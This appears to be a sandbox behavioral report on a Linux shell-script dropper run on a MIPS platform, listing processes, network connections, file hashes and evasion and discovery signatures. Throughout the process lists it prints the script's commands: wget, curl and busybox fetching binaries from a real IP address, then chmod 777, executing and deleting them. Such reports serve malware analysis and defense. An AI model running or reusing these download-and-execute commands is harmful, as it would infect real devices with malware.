[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/747-1-0xb6726000-0xb6737044-memory.dmp

memory/786-2-0xb6728000-0xb6739044-memory.dmp

memory/859-3-0xb675a000-0xb676b044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-25 01:17

Reported

2024-10-25 01:20

Platform

debian9-mipsbe-20240611-en

Max time kernel

84s

Max time network

86s

Command Line

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A

Processes

/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

